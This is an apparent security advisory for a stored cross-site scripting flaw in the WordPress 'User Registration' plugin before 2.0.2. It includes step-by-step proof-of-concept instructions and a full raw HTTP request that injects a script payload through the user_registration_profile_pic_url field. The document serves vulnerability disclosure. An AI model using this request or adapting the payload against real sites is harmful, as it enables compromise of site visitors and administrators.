User Registration < 2.0.2 - Low Privilege Stored Cross-Site Scripting

The plugin does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as subscriber, to perform Stored Cross-Site attacks when their profile is viewed

PoC

1. Login as any user (such as subscriber) and go to the edit profile page (the one generated by the plugin). 2. View the page source and get json var nonce “user_registration_profile_details_save” 3. Add the below form to the page and and replace the security nonce with the one from step 2, then submit it. 4. View the profile page (as any user) to trigger the XSS.

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 264 Connection: close Cookie: [your cookies, as any user] Upgrade-Insecure-Requests: 1 action=user_registration_update_profile_details&security;=143544a1fb&form;_data=%7B%22user_registration_profile_pic_url%22%3A%7B%22field_name%22%3A%22user_registration_profile_pic_url%22%2C%22value%22%3A%22%5C%22%3E%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E%22%7D%7D